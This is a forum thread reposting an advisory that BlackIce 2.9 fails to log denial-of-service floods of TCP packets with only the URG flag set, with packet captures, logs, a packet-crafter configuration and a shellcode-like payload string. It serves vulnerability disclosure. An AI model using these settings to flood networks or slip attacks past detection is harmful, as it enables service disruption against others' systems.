Results 1 to 2 of 2

Thread: Vulnerability:BlackIce 2.9 Undetectable DoS Attack

  1. #1
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584

    Exclamation Vulnerability:BlackIce 2.9 Undetectable DoS Attack

    BlackIce 2.9 car Latest with patch DOS attack

    Affected : BlackIce 2.9 car Latest with patch
    Type : DOS attacks with URG Flag Set ARE NOT LOGGED

    [ Brief History . . . . . . . . . . . . . . . . . . . . . .line 40 ]:
    :
    [ The Problem . . . . . . . . . . . . . . . . . . . . . . .line 60 ]:
    :
    [ The Solution . . . . . . . . . . . . . . . . . . . . . .line 156 ]:
    :
    +-------------. :
    Brief History :
    +---------------`-------------------------------------------------------.
    Blackice personal firewall do not log a DOS attack if sent with URG Flag:
    Set.
    To learn more about Blackice please visit:
    http://www.networkice.com/ or http://www.iss.net/


    +---------------------------+
    - Test OS Applications -
    Tested on Windows 2K with SP2 :
    Blackice Server 2.9 car
    Test was done on 4 boxes
    +-----------.
    The Problem
    +-------------`---------------------------------------------------------.
    I never played with Blackice before even I use often. I decide to play
    with it a bit last night and here is what I found.

    If you send a DOS (Denial Of Service) attack to an Blackice Server
    protected box NON of your attack will be LOGGED in blackice.

    PLEASE DO NOT MIX this is not an attack on blackice. But if you are
    using blackice as your ONLY IDS then you are affected.
    This mean you cannot trust Blackice Logs if you was attacked with the
    same type of attacks, because your blackice wont LOG these packets.
    (Packets sent with URG flag SET).



    A packet crafted with URG FLAG SET to 1 and all others FLAG set to 0
    will pass undetected by Blackice Server version.

    Other type of packets will be detected but the detection results is not
    that CORRECT. In the example below I sent a 5 packets with PUSH FLAG set
    to 1 and all others to 0 this was detected by BLackice as QUESO Scan.
    That is one example for many... Just play with it and you see your self.

    Now the bad issue is I was able to flood my local LAN with over 10000000
    packets (URG FLAG SET) and non of these packets was captured by BICE.

    NOTE: During the attack BlackICE LIGHT WAS GOING NUTS... BUT ZERO attack
    in the log or in the GUI.

    - PACKET DETECTED AS QUESO SCAN BUT AT LEAST WAS LOGGED -
    - Sniff Cpature -

    IP Header
    Length and version: 0x45
    Type of service: 0x00
    Total length: 78
    Identifier: 11783
    Flags: 0x0000
    TTL: 64
    Protocol: 17 (UDP)
    Checksum: 0xc87b
    Source IP: 192.168.1.103
    Dest IP: 192.168.1.101
    UDP Header
    Source port: 1031
    Dest port: 137
    Length: 58
    Checksum: 0xb7e3
    Raw Data
    80 b0 00 00 00 01 00 00 00 00 00 00 20 43 4b 41 ( CKA)
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 (AAAAAAAAAAAAAAAA)
    41 41 41 41 41 41 41 41 41 41 41 41 41 00 00 21 (AAAAAAAAAAAAA !)
    00 01 ( )

    - PACKET DETECTED AS QUESO SCAN BUT AT LEAST WAS LOGGED -
    IP Header
    Length and version: 0x45
    Type of service: 0x00
    Total length: 78
    Identifier: 11784
    Flags: 0x0000
    TTL: 64
    Protocol: 17 (UDP)
    Checksum: 0xc87a
    Source IP: 192.168.1.103
    Dest IP: 192.168.1.101
    UDP Header
    Source port: 1031
    Dest port: 137
    Length: 58
    Checksum: 0xb7e3
    Raw Data
    80 b0 00 00 00 01 00 00 00 00 00 00 20 43 4b 41 ( CKA)
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 (AAAAAAAAAAAAAAAA)
    41 41 41 41 41 41 41 41 41 41 41 41 41 00 00 21 (AAAAAAAAAAAAA !)
    00 01 ( )


    - PACKET NOT DETECTED AT ALL BY BLACKICE -
    ==============================================
    IP Header
    Length and version: 0x45
    Type of service: 0x00
    Total length: 72
    Identifier: 18539
    Flags: 0x0000
    TTL: 128
    Protocol: 6 (TCP)
    Checksum: 0x6e28
    Source IP: 192.168.1.101
    Dest IP: 192.168.1.103
    TCP Header
    Source port: 1
    Dest port: 1
    Sequence: 3158779
    ack: 0
    Header length: 0x50
    Flags: 0x20 (URG )
    Window Size: 512
    Checksum: 0x27cb
    Urgent Pointer: 0
    Raw Data
    78 39 30 78 65 62 78 30 33 78 35 64 78 65 62 78 (x90xebx03x5dxebx)
    30 35 78 65 38 78 66 38 78 66 66 78 66 66 78 00 (05xe8xf8xffxffx )

    - PACKET NOT DETECTED AT ALL BY BLACKICE -

    IP Header
    Length and version: 0x45
    Type of service: 0x00
    Total length: 40
    Identifier: 11785
    Flags: 0x0000
    TTL: 64
    Protocol: 6 (TCP)
    Checksum: 0xc8aa
    Source IP: 192.168.1.103
    Dest IP: 192.168.1.101
    TCP Header
    Source port: 1
    Dest port: 1
    Sequence: 0
    ack: 3158811
    Header length: 0x50
    Flags: 0x14 (ACK RST )
    Window Size: 0
    Checksum: 0xf866
    Urgent Pointer: 0
    Raw Data
    ()


    - BLACKICE LOG -


    13:00:50 27 BlackICE detection stopped 0.0.0.0 0.0.0
    13:01:56 26 BlackICE detection started 0.0.0.0 0.0.0
    13:05:07 2000321 Queso Scan 192.168.1.101 192.168.1.103
    13:10:07 2000321 Queso Scan 192.168.1.101 192.168.1.103

    - NOT DETECTED ATTACK WITH URG SET IS SUPPOSED TO BE HERE -
    - NOT DETECTED ATTACK WITH URG SET IS SUPPOSED TO BE HERE -


    - TCP Settings that may help you understanding what I sent -

    [TCP]
    fURG=1
    fACK=0
    fPUSH=0
    fRESET=0
    fSYN=0
    fFIN=0
    Acknowledge=0
    Sequence=0
    Window=0
    Offset=0
    Urgent=0
    Checksum=0
    SpecifyTCPChecksum=0
    Data=x90xebx03x5dxebx05xe8xf8xffxffx

    [UDP]
    Checksum=0
    SpecifyUDPChecksum=0
    Data=

    [ICMP]
    Type=0
    Code=0
    Checksum=0
    SpecifyICMPChecksum=0
    Data=
    Identifier=0
    Sequence=0
    Message=0

    [IP]
    SourceAddress=
    SourcePort=1
    DestinationAddress=
    DestinationPort=1
    HeaderSize=20
    SpecifyHeaderSize=0
    Identification=0
    SpecifyIdentification=0
    Checksum=0
    SpecifyChecksum=0
    TypeService=0
    FragmentationType=2
    DataSize=0
    Offset=0
    TTL=1

    +------------.
    The Solution
    +--------------`---------------------------------------------------------.
    No idea. Vendor should be informed... Blackice now I guess is owned by
    ISS.Net.
    +------------------------------------------------------------------------.

  2. #2
    Priapistic Monk KorpDeath's Avatar
    Join Date
    Dec 2001
    Posts
    2,628
    Go figure. An IDS that doesn't work when under attack........what will they come up with next?
    Mankind have a great aversion to intellectual labor; but even supposing knowledge to be easily attainable, more people would be content to be ignorant than would take even a little trouble to acquire it.
    - Samuel Johnson

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •